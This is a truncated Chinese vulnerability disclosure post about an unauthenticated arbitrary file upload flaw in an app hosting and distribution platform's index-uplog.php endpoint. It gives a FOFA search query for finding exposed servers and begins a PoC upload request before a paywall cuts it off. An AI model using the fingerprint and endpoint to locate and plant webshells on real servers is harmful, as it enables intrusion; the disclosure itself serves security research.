超级会员免费看
0x01 产品简介
App托管服务分发平台是一个为开发者提供全面、高效、安全的应用程序托管、分发和推广服务的平台。开发者可以将自己开发的应用程序上传到平台上,平台会对上传的应用程序进行审核,确保应用的质量和安全性。平台会根据开发者的要求,将应用分发到不同的应用市场、社交网络、广告平台等渠道上,扩大应用的曝光范围。同时,平台还提供多种推广服务,如搜索引擎优化、社交媒体推广、广告投放等,帮助开发者提高应用的下载量和知名度。帮助开发者更高效、更安全地推广他们的应用程序,实现商业价值的最大化。
0x02 漏洞概述
App托管服务分发平台 index-uplog.php 接口处存在任意文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传webshell致服务器,执行任意代码,从而获取服务器权限。
0x03 复现环境
FOFA:body="/api/statistics/service-usage-amount"
0x04 漏洞复现
PoC
POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
